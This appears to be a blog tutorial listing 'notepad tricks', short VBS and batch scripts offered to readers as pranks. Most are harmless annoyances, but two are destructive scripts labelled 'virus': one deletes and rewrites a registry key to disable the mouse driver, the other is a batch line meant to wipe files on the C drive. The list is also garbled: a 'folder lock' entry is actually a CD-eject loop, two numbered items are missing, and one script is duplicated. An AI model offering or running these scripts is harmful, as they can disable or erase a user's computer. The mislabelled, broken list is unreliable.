Hi friends in this tutorial i am gonna list top 10 cool notepad ticks.Notepad is a plain-text editor which is included in all windows.It is a built in apps.It is used to open plain text files.Notepad offers only the most basic text manipulation functions, such as finding text.Basically many of us use the notepad in order to store information.But have you ever tried to use it in different way i.e for making fun?If not i will teach you some funny and best notepad tricks.
1.Disco lights on keyboard:
- In order to do this open notepad and copy the code in it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
- Save it with an extension .vbs.
- In order to stop it just go the Task manager and search for wscript.exe as show in the image.
2.Disabling the mouse by creating a virus:
- It is harmful so think before you do it.
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
- Save it with an extension .bat.
3.Format c drive by creating a virus:
- This one is too harmful so think before you do it.
@ECHO OFF DEL C:\ *.*|Y
- Save this file with an extension .bat.
- I recommend you to use this one carefully.
4.Making your computer speak to you
- In order to do this open notepad and copy the code.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
- Now save it as .vbs file.If you want to make it run at the time of windows start,just move the file to starts up as shown below.
All programs>Startup
5.Folder lock :
- Open the notepad and copy the code given below.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
- save it with an extension .vbs.
- You can stop it by going into task manager>Processes>Wscript.exe.
7.Matrix Effect trick:
- In order to do this open notepad and copy the code in it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
- Save it as .bat file.
8.Repeating a message continuously:
- It will repeat continuously as long as you open it.
@ECHO off
:Begin
msg * Hi
msg * Welcome to worldtech360
msg * Have a nice time
GOTO BEGIN
- Save the above one with an extension .bat.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
- Save it with an extension .vbs.
- You can stop by going in to the task manger and closing wscript.exe application.
10.Making Personal dairy:
- Open notepad and type .LOG.
- Now save the file with .txt and with any name.
- Open the file once again,now you will find the time and date in it as shown below.
That's it friends now enjoy doing the above tricks and if you have any queries feel free to ask us through comments.
Comments
Post a Comment